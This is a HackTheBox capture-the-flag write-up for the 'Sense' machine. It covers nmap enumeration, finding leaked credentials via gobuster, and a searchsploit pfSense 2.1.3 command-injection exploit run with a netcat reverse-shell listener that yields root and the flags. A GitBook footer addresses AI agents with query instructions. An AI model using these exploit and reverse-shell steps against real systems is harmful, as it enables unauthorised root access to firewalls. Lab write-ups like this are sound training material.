> For the complete documentation index, see [llms.txt](https://jtnydv.gitbook.io/wiki/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jtnydv.gitbook.io/wiki/write-ups/hackthebox/linux/sense.md).

# Sense

### Initial Enumeration

```bash
# Nmap 7.80 scan initiated Fri Sep 27 18:41:07 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,443 10.10.10.60
Nmap scan report for 10.10.10.60
Host is up (0.24s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  ssl/https?
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose
Running (JUST GUESSING): Comau embedded (92%), OpenBSD 4.X (85%)
OS CPE: cpe:/o:openbsd:openbsd:4.3
Aggressive OS guesses: Comau C4G robot control unit (92%), OpenBSD 4.3 (85%), OpenBSD 4.0 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   243.80 ms 10.10.14.1
2   243.69 ms 10.10.10.60

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 27 18:42:59 2019 -- 1 IP address (1 host up) scanned in 111.85 seconds
```

![](/files/-Lpmr4tbvpgfyyHnH-ii)

Checking out the page, it turns out it the login interface of `pfsense` and the default credentials of `admin:pfsesne` did not seem to work. So I ran `gobuster` on the URL and found a `txt` file called `system-users.txt` which contained the username `rohit` and password was supposed to be `company default`, so I chose to try `pfsense` and this combination got me into the dashboard.

![](/files/-LpmrE1OBvvFUsPImak3)

As evident from the version information this is `pfsense 2.1.3`, so I ran this service and version info against `searchsploit` and found one command injection vulnerability.

```bash
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                |  Path
                                                                                                              | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                                | exploits/php/webapps/43560.py
-------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
```

### User and Root own

So I ran the exploit script with the parameters it required and was able to get a shell as root on the system.

```bash
python3.7 43560.py --username rohit --password pfsense --lhost 10.10.14.8 --rhost 10.10.10.60 --lport 5555
```

```bash
$ nc -lvnp 5555
listening on [any] 5555 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.60] 21729
sh: can't access tty; job control turned off
# id
uid=0(root) gid=0(wheel) groups=0(wheel)
# cat /root/root.txt
d08c3***
# cat /home/rohit/user.txt
87213***
```

### Learning outcome

I need to find better word-list which are more comprehensive and thorough in terms of research. The ones I used, just barely got me through this time.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://jtnydv.gitbook.io/wiki/write-ups/hackthebox/linux/sense.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
